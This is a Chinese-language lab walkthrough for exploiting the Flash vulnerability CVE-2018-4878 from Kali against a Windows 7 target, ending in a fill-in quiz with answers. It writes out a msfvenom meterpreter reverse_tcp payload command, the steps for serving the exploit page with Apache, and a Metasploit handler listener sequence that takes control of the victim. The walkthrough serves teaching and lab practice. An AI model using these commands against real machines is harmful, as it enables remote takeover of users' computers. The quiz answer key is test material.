CVE-2018-4878 Flash 漏洞 实验
实验目的
- 由于Flash存在CVE-2018-4878这个高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制。
实验原理
- 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被"远程代码执行",并且直接被getshell。
实验环境
1.操作系统
操作机:kali
目标机:windows7
实验步骤步骤1:使用msfvenom生成shell代码
1.1.生成代码,其中lhost为kali的ip地址,lport为自定义的端口号
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.143.0.30 lport=8888 -f python>/root/shellcode.txt
图1
1.2.查看代码
cat /root/shellcode.txt
图2
1.3.在/root/CVE-2018-4878-master目录,gedit编辑CVE-2018-2878.py,将上面msfvenom生成的代码覆盖原来的代码
图3
1.4. 修改CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出):
图4
1.5.进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878.py代码
图5
1.6.kali linux 开启Apache2服务,并将上面生成的2个文件放入/var/www/html目录中
图6
此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。
实验步骤
步骤2:开启监听并控制
2.1.开启会话进行监听
msfconsole 启动msf
use exploit/multi/handler 使用handler监听模块
set payload windows/meterpreter/reverse_tcp 设置一个tcp回弹连接
set LHOST 10.143.0.30 设置kali渗透机的ip地址
set LPORT 8888 设置监听端口,这个需跟上面msfvenom设置的端口一致
exploit 开启监听等待上线
图7
2.2.切到目标机安装flash插件选择不更新
图8
2.3.使用Win 7内置的IE 8浏览器访问页面10.143.0.30/index2.html
图9
2.4.查看操作机已经获取meterpreter shell,并进行管理,可以看到目标机已经成功的被操作机控制。
图10
图11
图12
综合测验
【题目概览】
共计3题
单选题共计0题
多选题共计0题
填空题共计3题
1【填空题】图11遮挡处为x86
【正确答案】:x86
2【填空题】图12遮挡处为Desktop
【正确答案】:Desktop
3【填空题】如何启动apache服务?service apache2 start
【正确答案】:apache2